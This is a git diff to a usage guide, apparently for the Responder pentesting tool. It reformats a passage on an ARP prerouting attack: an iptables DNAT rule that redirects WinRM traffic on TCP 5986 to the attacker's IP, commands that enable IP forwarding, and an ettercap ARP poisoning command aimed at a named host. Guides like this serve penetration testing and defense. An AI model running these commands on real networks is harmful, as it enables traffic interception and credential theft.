diff --git a/Responder-Usage.md b/Responder-Usage.md index a497e3f..53edecd 100644 --- a/Responder-Usage.md +++ b/Responder-Usage.md @@ -88,5 +88,8 @@ Let's set an ARP Prerouting attack, and redirect the sysadmin workstation to our //Rewrite IP header destination with your IP instead of the original one for all packets going to TCP 5986 > iptables -t nat -A PREROUTING -p tcp --dport 5986 -j DNAT --to-destination YOUR-IP:5986 -//Enable IP Forward to avoid disruption and launch a targeted ARP attack against 192.168.0.153 ->echo 1 > /proc/sys/net/ipv4/ip_forward&&ettercap -T -q -w dump-session.pcap -p -M arp:remote /192.168.0.254// /192.168.0.153// \ No newline at end of file +//Enable IP Forward to avoid disruption +>echo 1 > /proc/sys/net/ipv4/ip_forward + +//Launch the targeted ARP poisoning against 192.168.0.153 +&&ettercap -T -q -w dump-session.pcap -p -M arp:remote /192.168.0.254// /192.168.0.153// \ No newline at end of file